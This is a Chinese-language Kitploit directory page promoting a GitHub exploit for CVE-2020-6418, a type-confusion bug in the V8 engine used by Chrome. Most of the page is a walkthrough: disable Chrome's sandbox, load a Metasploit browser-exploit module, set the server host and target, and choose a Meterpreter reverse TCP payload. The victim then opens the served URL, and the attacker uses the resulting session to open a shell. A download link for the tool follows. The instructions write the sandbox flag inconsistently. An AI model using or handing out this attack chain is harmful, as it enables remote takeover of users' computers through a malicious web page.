Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-6418 — CVE-2020-6418 的漏洞利用程序,这是 V8 中的一个类型混淆漏洞,可通过精心构造的 HTML 页面实现远程代码执行。使用 Metasploit 传递反向 Shell 载荷。 | Kitploit
工具/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
漏洞利用框架Payload生成漏洞利用Web应用程序漏洞利用渗透测试
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

CVE-2020-6418 的漏洞利用程序,这是 V8 中的一个类型混淆漏洞,可通过精心构造的 HTML 页面实现远程代码执行。使用 Metasploit 传递反向 Shell 载荷。

查看仓库
1134年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-6418

CVE-2020-6418 涉及 Google Chrome 中 V8 引擎的类型混淆漏洞。受影响的版本早于 80.0.3987.122。远程攻击者可通过特制的 HTML 页面获取目标设备的 shell。

环境要求

  1. 版本早于 80.0.3987.122 的 Google Chrome。
root@kitploit:~
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
  1. Metasploit Framework
  2. 操作系统:任意

漏洞利用设置

  1. Google Chrome 版本 v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

无沙箱模式下的 Google Chrome 设置

i) 为 Google Chrome 创建快捷方式
ii) 点击“属性”> 进入名为“目标”的选项
iii) 在 EXE 末尾,留一个空格并输入 -no--sandbox
iv) 点击“应用”>“确定”
v) 打开新的 Google Chrome 浏览器,你将看到如下弹窗。

root@kitploit:~
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

禁用沙箱演示

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

使用 Metasploit

由于我们使用 Kali 作为执行漏洞利用的环境,而 Metasploit 是该发行版内置的工具。但如果你使用其他发行版,则需要在开始漏洞利用之前先设置好 Metasploit。

请参阅 Metasploit 安装 以进一步了解。

执行漏洞利用

i) 启动 Metasploit 框架

root@kitploit:~
> msfconsole

ii) 查找漏洞利用模块

root@kitploit:~
> search chrome_js

iii) 使用上述输出中的可用漏洞利用模块

root@kitploit:~
> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) 设置 SRVHOST IP 地址

root@kitploit:~
> set SRVHOST <ip address>

v) 设置目标 这里我们有两个选项

  1. 目标 0:适用于 Windows
  2. 目标 1:适用于 MAC
root@kitploit:~
> set Target " Number "

vi) 设置 Payload

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) 查看当前设置和已启用的选项。

root@kitploit:~
> show options

viii) 运行漏洞利用

root@kitploit:~
> run (or) > exploit

ix) 你将获得一个 URL,需要将其复制到浏览器中才能激活会话。 x) 一旦用户访问该 URL,便会创建一个会话。要检查会话,请执行:

root@kitploit:~
> show sessions

xi) 使用该会话,我们可以查看用户系统信息 / 进入 shell。

root@kitploit:~
> sessions <number>
> shell

漏洞利用演示

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

下载工具